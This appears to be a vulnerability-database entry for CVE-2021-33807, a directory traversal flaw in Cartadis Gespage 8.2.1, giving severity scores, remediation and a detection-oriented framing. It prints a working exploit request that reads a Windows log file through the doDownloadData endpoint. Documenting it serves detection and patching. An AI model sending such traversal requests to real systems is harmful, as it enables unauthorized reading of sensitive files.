🔙 목록으로 돌아가기

CVE-2021-33807: Cartadis Gespage 8.2.1 - Directory Traversal

TitleCartadis Gespage 8.2.1 - Directory Traversal
Authordaffainfo
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further compromise of the system.
RemediationApply the latest security patch or update provided by the vendor to fix the directory traversal vulnerability in Cartadis Gespage 8.2.1.
CVSS Score7.5
EPSS Score0.7766
CVE IDCVE-2021-33807
CWE IDCWE-22
Tags cve2021 cve lfi gespage vuln

🔍 Vulnerability Description

Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.

🌐 HTTP Request

GET /gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.3
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-33807.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-33807.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A